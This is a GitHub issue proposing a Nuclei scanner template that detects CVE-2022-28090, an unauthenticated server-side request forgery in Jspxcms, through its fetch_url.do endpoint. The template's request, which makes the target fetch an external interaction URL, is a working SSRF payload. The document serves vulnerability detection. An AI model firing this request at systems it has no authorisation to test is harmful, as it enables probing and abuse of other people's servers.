### ISSUE TITLE
CVE-2022-28090

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4297]
```yaml
id: CVE-2022-28090

info:
  name: Jspxcms < 10.2.0 - Unauthenticated SSRF
  author: Akincibor
  severity: high
  description: Jspxcms v10.2.0 allows attackers to execute a Server-Side Request Forgery (SSRF) via /cmscp/ext/collect/fetch_url.do?url=.
  reference:
    - https://gitee.com/jspxcms/Jspxcms/issues/I4ZKDR
  tags: ssrf,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cmscp/ext/collect/fetch_url.do?url=https://{{interactsh-url}}/'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
```
